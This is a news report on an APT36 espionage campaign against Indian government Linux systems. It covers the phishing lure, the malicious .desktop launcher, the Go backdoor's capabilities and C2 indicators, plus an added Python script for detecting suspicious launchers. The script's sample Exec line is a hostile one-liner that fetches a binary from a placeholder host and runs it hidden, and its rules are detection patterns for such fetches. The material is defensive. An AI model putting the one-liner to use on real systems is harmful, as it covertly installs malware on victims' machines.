A newly uncovered campaign by Pakistani threat actor APT36, also known as Transparent Tribe, reveals a significant evolution in their cyber-espionage playbook—this time, taking aim squarely at Linux-based systems. According to a recent report from cybersecurity firm CYFIRMA, the group has shifted its focus toward exploiting BOSS Linux, a distribution widely deployed across Indian government agencies.
“The deployment of Linux-specific malware signifies a noteworthy advancement in APT36’s operational capabilities and highlights the increasing risk posed to critical government and defense infrastructure,” the report warns.
The operation begins with a phishing email masquerading as a cybersecurity advisory. The attached ZIP archive, named Cyber-Security-Advisory.zip, contains a .desktop file designed to look like a harmless shortcut. But this file is anything but benign.
Upon execution, the .desktop file pulls a clever sleight-of-hand: it opens a PowerPoint decoy (slide.pptx) using LibreOffice Impress to maintain the illusion of legitimacy, while silently fetching and launching a malicious ELF binary (BOSS.elf) in the background.
“This carefully orchestrated sequence enables the attacker to deploy and execute malware without alerting the victim,” CYFIRMA states, noting the dual-action strategy as both deceptive and highly effective.
The malicious ELF binary—written in Go and dropped locally as client.elf—executes using nohup, ensuring persistence even if the user logs out. All signs of the execution are suppressed via output redirection to /dev/null.
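As an added example (not code from the article or from CYFIRMA's report), a small Python triage script that parses a .desktop launcher and flags the Exec= traits described above: a shell one-liner that opens a decoy document, fetches a binary, detaches it with nohup and sends its output to /dev/null. The two .desktop samples, the rule names and the two-indicator threshold are constructed for illustration; the URL and file paths are placeholders, not indicators from the report.

```python
import re
from typing import Dict, List

# Constructed sample modelled on the delivery chain described above (decoy slide opened
# in LibreOffice Impress, ELF fetched, detached with nohup, output to /dev/null).
# The URL and file paths are placeholders, not indicators taken from the report.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory
Icon=libreoffice-impress
Exec=sh -c "libreoffice --impress /tmp/slide.pptx & curl -s http://placeholder.invalid/x -o /tmp/client.elf; chmod +x /tmp/client.elf; nohup /tmp/client.elf >/dev/null 2>&1 &"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=LibreOffice Impress
Exec=libreoffice --impress %U
"""

# Heuristic indicators in an Exec= value; each matches one step of the chain above.
RULES: List[tuple] = [
    ("shell-wrapper", re.compile(r"^(?:/bin/)?(?:ba)?sh\s+-c\b")),   # launcher delegates to a shell one-liner
    ("remote-fetch", re.compile(r"\b(?:curl|wget)\b")),              # payload downloaded at click time
    ("chmod-exec", re.compile(r"\bchmod\s+\+?x\b")),                 # downloaded file made executable
    ("nohup-detach", re.compile(r"\bnohup\b")),                      # process survives the session ending
    ("output-suppressed", re.compile(r">\s*/dev/null")),             # output and errors hidden
    ("tmp-execution", re.compile(r"(?:^|[\s;&|])/tmp/\S+")),         # payload staged in /tmp
    ("decoy-document", re.compile(r"\b(?:libreoffice|soffice|xdg-open)\b.*\.(?:pptx?|docx?|pdf)\b")),
]

def parse_desktop(text: str) -> Dict[str, str]:
    """Minimal parser: return key/value pairs from the [Desktop Entry] group only."""
    entries: Dict[str, str] = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip()] = value.strip()
    return entries

def analyze_desktop(text: str) -> Dict[str, object]:
    """Score the Exec= command; two or more indicators marks the launcher suspicious."""
    exec_cmd = parse_desktop(text).get("Exec", "")
    hits = [name for name, rx in RULES if rx.search(exec_cmd)]
    return {"exec": exec_cmd, "hits": hits, "suspicious": len(hits) >= 2}
```

Running the same check over `~/.local/share/applications` and `~/Desktop` on a host gives a quick hunting pass; a legitimate launcher almost never needs a shell wrapper that downloads and detaches a binary.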
Once active, the malware embarks on several key functions:
- Reconnaissance: Gathers system hostname, CPU, RAM specs, runlevel, and startup scripts.
- Persistence & Evasion: Uses main.junkcalc2 for stealthy logging while avoiding antivirus detection.
- Data Discovery & Exfiltration: Employs os.ReadDir to search file systems and main.sendResponse for uploading stolen data.
- Visual Surveillance: Uses the Go library github.com/kbinani/screenshot to capture images of the user’s desktop.
The malware connects to a known C2 server at 101.99.92[.]182:12520, maintaining communication with keep-alive mechanisms that retry every 30 seconds—indicating a strong intent to preserve access for long-term espionage.
The campaign also leverages the domain sorlastore.com, a known APT36 asset. This infrastructure has been used in parallel attacks targeting Windows environments through PPAM (PowerPoint Add-in) files embedded with malicious macros.
“These campaigns reflect tactics like those observed in Linux-based attacks, utilizing phishing emails that deliver PPAM files crafted to resemble legitimate cybersecurity or defense-related advisories,” CYFIRMA notes.
This latest APT36 campaign marks a stark warning for the cybersecurity posture of organizations relying on Linux systems, particularly within sensitive government or defense roles.
“Organizations, particularly those operating within the public sector and utilizing Linux-based systems, are strongly advised to treat this threat as a matter of high priority,” the report concludes.